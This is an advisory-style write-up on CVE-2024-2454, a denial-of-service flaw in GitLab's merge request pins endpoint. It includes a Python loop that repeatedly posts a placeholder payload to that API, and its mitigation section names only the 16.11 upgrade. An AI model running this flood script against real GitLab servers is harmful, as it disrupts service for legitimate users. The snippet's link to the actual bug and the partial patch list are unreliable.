CVE-2024-2454 - GitLab CE/EE Suceptible to DoS Attacks via the Pins Endpoint in Multiple Versions

A newly discovered issue, with the code identifier CVE-2024-2454, affects GitLab Community Edition (CE) and Enterprise Edition (EE). GitLab is a widely-used source code management platform that allows users to develop, collaborate, and deploy their software projects efficiently. The vulnerability was found in GitLab CE/EE versions starting from 15.11 prior to 16.9.7, starting from 16.10 prior to 16.10.5, and starting from 16.11 prior to 16.11.2. The issue makes the GitLab 'pins' endpoint prone to Denial of Service (DoS) attacks that can be initiated through a specially crafted request.

Exploit Details

A DoS attack typically involves overwhelming a network or service with an excessive amount of requests, rendering it unavailable to legitimate users. In this case, an attacker can send a malicious request to the pins endpoint on GitLab, causing an overload in the server's resources, and result in the service being unresponsive temporarily.

The exploit involves the attacker crafting a specific request targeting the 'pins' endpoint, and sending it repeatedly within a short period, generating a surge in processing demands on the server. As a result, the server's resources are stretched thin, adversely affecting the availability of the service for legitimate users.

Code Snippet Example Demonstrating the Potential Attack

import requests

# Replace '{TARGET_URL}' with the target GitLab CE/EE instance
target_url = '{TARGET_URL}/api/v4/projects/1234/merge_requests/5678/pins'

# Replace '{PRIVATE_TOKEN}' with a valid private token
headers = {
    'Private-Token': '{PRIVATE_TOKEN}',
}

# Crafted request payload
data = {
  'invalid_key': 'invalid_value'
}

# Sending the malicious request multiple times
for _ in range(100):
  response = requests.post(target_url, headers=headers, data=data)

Please note that the above example is for educational purposes only. Do not use it with malicious intent or against any targets without explicit permission.

Original References

- GitLab Security Advisory: CVE-2024-2454 GitLab CE/EE Pins Endpoint DoS vulnerability
- NVD (National Vulnerability Database) - CVE-2024-2454: https://nvd.nist.gov/vuln/detail/CVE-2024-2454

Mitigation

To address this issue, all affected users should immediately upgrade their GitLab CE/EE installations to the latest patched versions available:

For those using 16.11, upgrade to 16.11.2

GitLab's official upgrade documentation can be found here: Upgrading GitLab

Conclusion

Understanding and addressing vulnerabilities like CVE-2024-2454 is crucial. As a GitLab CE/EE user, it is imperative that you stay up-to-date on the latest patches and version upgrades to minimize the impact of any potential vulnerabilities. For additional information, always refer to the original sources and follow best practices to maintain a secure environment.

Timeline

Published on: 05/14/2024 15:19:23 UTC
Last modified on: 05/14/2024 16:13:02 UTC